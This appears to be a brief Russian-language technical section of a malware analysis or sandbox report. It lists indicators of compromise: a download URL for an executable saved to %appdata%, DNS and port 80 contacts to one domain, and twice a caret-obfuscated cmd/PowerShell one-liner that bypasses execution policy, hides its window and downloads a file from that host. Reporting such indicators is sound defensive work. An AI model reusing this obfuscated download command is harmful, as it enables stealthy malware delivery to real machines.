Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^ErsHELl.EXe -EX^e^c^uTION^P^olI^cy By^p^asS^ -^nopR^ofi^Le ^-W^iNdowSt^Yle ^h^I^ddeN (^ne^W-ob^jE^CT ^s^Y^sTEM.nE^T.WEbcLIEN^T).^doWN^Lo^Adf^I^le^('http://asecwitlecn.bid/re...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /C "POW^ErsHELl.EXe -EX^e^c^uTION^P^olI^cy By^p^asS^ -^nopR^ofi^Le ^-W^iNdowSt^Yle ^h^I^ddeN (^ne^W-ob^jE^CT ^s^Y^sTEM.nE^T.WEbcLIEN^T).^doWN^Lo^Adf^I^le^('http://asecwitlecn.bid/re...' (со скрытым окном)